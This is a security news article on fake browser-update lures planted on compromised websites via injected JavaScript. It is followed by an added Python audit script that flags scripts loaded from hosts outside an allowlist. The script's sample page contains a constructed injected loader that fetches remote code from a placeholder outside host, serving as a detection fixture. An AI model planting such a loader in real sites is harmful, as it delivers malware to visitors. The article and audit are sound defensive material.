Watch Out: Attackers Are Hiding Malware in Browser Updates

Published: 23/11/2024   Category: security


Updating your browser when prompted is a good practice; just make sure the notification actually comes from the vendor.



Threat actors are using cybersecurity best practices against you, hiding malware inside of fake browser updates.
They do so by seeding legitimate but vulnerable websites with malicious JavaScript. Upon loading, the code presents users with convincing browser update notifications, masking dangerous payloads.
According to an Oct. 17 report from Proofpoint, the trend began with one threat actor, TA569, and it has since been adopted by at least four different threat clusters, in what appears to be a growing and intractable new trend.
"TA569 has been very active for quite some time, and I've seen how difficult it has been for customers to understand and remediate the threat on their own," says Daniel Blackford, senior manager of threat research at Proofpoint. Because it's so effective, he adds, other threat actors have "absolutely piggybacked on it."
Though they may vary in the particulars, each of the four threat clusters tracked by Proofpoint follows largely the same script.
First, the actors take advantage of a legitimate but vulnerable website, injecting their own malicious JavaScript code.
"It's generally very opportunistic. We have seen it across basically every industry: media, local sports associations — like kids' soccer groups — software companies, in some cases," Blackford says.
It might be an unpatched vulnerability, or a WordPress misconfiguration that provides the opening, but it doesn't always have to be the website itself. "It can be any assets that are imported into the website — any type of styling template, media player, or pretty much any third-party code," he says.
When an end user loads the website, the attacker's script runs alongside the rest of the site's various assets. Its job is to refer traffic to an attacker-controlled domain.
From here, Blackford explains, "the Web inject is going to take some information about your system — you're coming from this geographic location, you're using this browser version. It can determine whether you're in some type of virtual environment or not. And if you pass all of the criteria, then it's going to reach out to that backend server and pull in the fake update page."
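The injection described above lands either in the site's own pages or in a third-party asset the site imports, and its job is to hand visitors to an outside domain. One check a site owner can run against their own pages, as an added example that is not from the article, Proofpoint, or the researchers quoted, is to compare every script source and every host referenced from inline script text against an allowlist of hosts that legitimately serve the site's scripts. The allowlist, the page host and the sample page below are constructed; the `.example` domain is a placeholder.

```python
"""Audit a page's <script> elements against a script-host allowlist.

Added example (not from the article, Proofpoint, or the researchers quoted):
a site owner who keeps a list of hosts that legitimately serve scripts can
re-run this check over their own pages to catch an injected loader that
pulls from, or hands visitors to, an outside domain. The allowlist and the
sample page below are constructed; the '.example' host is a placeholder.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the site's own host plus the third parties it has vetted.
ALLOWED_SCRIPT_HOSTS = {"www.example-league.org", "cdn.jsdelivr.net"}

# Absolute or protocol-relative URL inside script text; captures the host.
_URL_HOST_RE = re.compile(r"(?:https?:)?//([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.IGNORECASE)


class _ScriptCollector(HTMLParser):
    """Collects <script src> values and the bodies of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src.strip())
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self._in_inline = False
            self.inline.append("".join(self._buf))


def audit_scripts(html, page_host, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (finding, detail) pairs for scripts outside the allowlist.

    Relative src values resolve to page_host, so first-party files are only
    flagged if the page's own host is missing from the allowlist.
    """
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src in collector.external:
        host = urlparse(src).netloc.lower() or page_host.lower()
        if host not in allowed_hosts:
            findings.append(("external-script-not-allowlisted", src))
    for body in collector.inline:
        seen = set()
        for host in _URL_HOST_RE.findall(body):
            host = host.lower()
            if host not in allowed_hosts and host not in seen:
                seen.add(host)
                findings.append(("inline-script-references-host", host))
    return findings


# Constructed sample: a legitimate page carrying two injected pieces, one
# protocol-relative <script src> and one inline loader that appends a script
# from the same outside host.
SAMPLE_PAGE = """<!doctype html>
<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.jsdelivr.net/npm/jquery/dist/jquery.min.js"></script>
<script src="//cdn.update-check.example/a.js"></script>
<script>
  var s = document.createElement("script");
  s.src = "https://cdn.update-check.example/loader.js";
  document.head.appendChild(s);
</script>
</head><body><h1>Match schedule</h1></body></html>
"""

if __name__ == "__main__":
    for kind, detail in audit_scripts(SAMPLE_PAGE, "www.example-league.org"):
        print(f"{kind}: {detail}")
```

Run it over the HTML your site actually serves to visitors (fetched through a browser-like client, since the injected code may be delivered conditionally), and diff the findings against a known-good baseline; a host that was never on the allowlist appearing in either a `src` attribute or inline script text is exactly the deviation from the usual pattern that the article describes.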
The update lures are designed to look like they're coming from the browsers' developers, with a clean look and relevant iconography. The following screenshots, courtesy of the security researcher Jerome Segura, capture fake updates from TA569 and another cluster, FakeSG, also known as RogueRaticate (see below).
If a user falls for the trap and clicks "Update," they download malware to their computer.
If the attacker is TA569, for example, a user will download its signature SocGholish initial access malware. In the past, SocGholish has been used as a primer for ransomware, including WastedLocker, LockBit, Dridex, Hive, and more.
Employees and otherwise educated civilians are taught to avoid links and attachments in unrecognized emails or text messages. They might know to avoid a seedy-looking link, but what about a notification coming from their browser?
To suss out a real update from a fake one, Blackford urges users to pay attention to how their trusted websites and browsers typically behave, and whether anything happens that doesn't align with the usual pattern.
"Nine times out of 10, I'll go to my kids' soccer league website and see: okay, we've got a match against some other school on Wednesday, and nothing happens. And then one time, all of a sudden, I'm redirected to a page that says I'm using an old version of Chrome, click this button to update. That difference in pattern should be the trigger," he says, while admitting that it's not easy to spot. "But that's also why bad guys continue to make money hand over fist."
In the end, users shouldn't be spooked from maintaining their cybersecurity hygiene. "Updating your browser is a good security practice," Blackford maintains, "and I strongly suggest that people do it."
